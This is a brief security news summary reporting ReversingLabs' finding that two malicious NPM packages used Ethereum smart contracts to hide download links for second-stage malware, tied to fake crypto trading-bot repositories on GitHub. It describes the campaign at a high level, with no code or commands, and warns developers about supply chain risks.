Ethereum Smart Contracts Used to Conceal Malware in Supply Chain Attacks

Recent research from ReversingLabs revealed two malicious NPM packages, “colortoolsv2” and “mimelib2,” utilizing Ethereum smart contracts to hide harmful code. Key points include:

The packages were uploaded to the Node Package Manager in July.
They fetched hidden URLs directing systems to download second-stage malware.
Attackers disguised their activities as legitimate blockchain traffic, complicating detection.
This method expands on previous tactics using trusted services for hosting malicious links.
The malicious packages were linked to fake GitHub repositories portraying cryptocurrency trading bots.
Developers risked importing malware unknowingly.
The incident highlights ongoing supply chain risks in open-source crypto tools, building on over 20 flagged campaigns last year aimed at stealing wallet credentials or installing crypto miners.

Developers should be cautious of fake commits and maintainers, as even innocuous packages may conceal threats.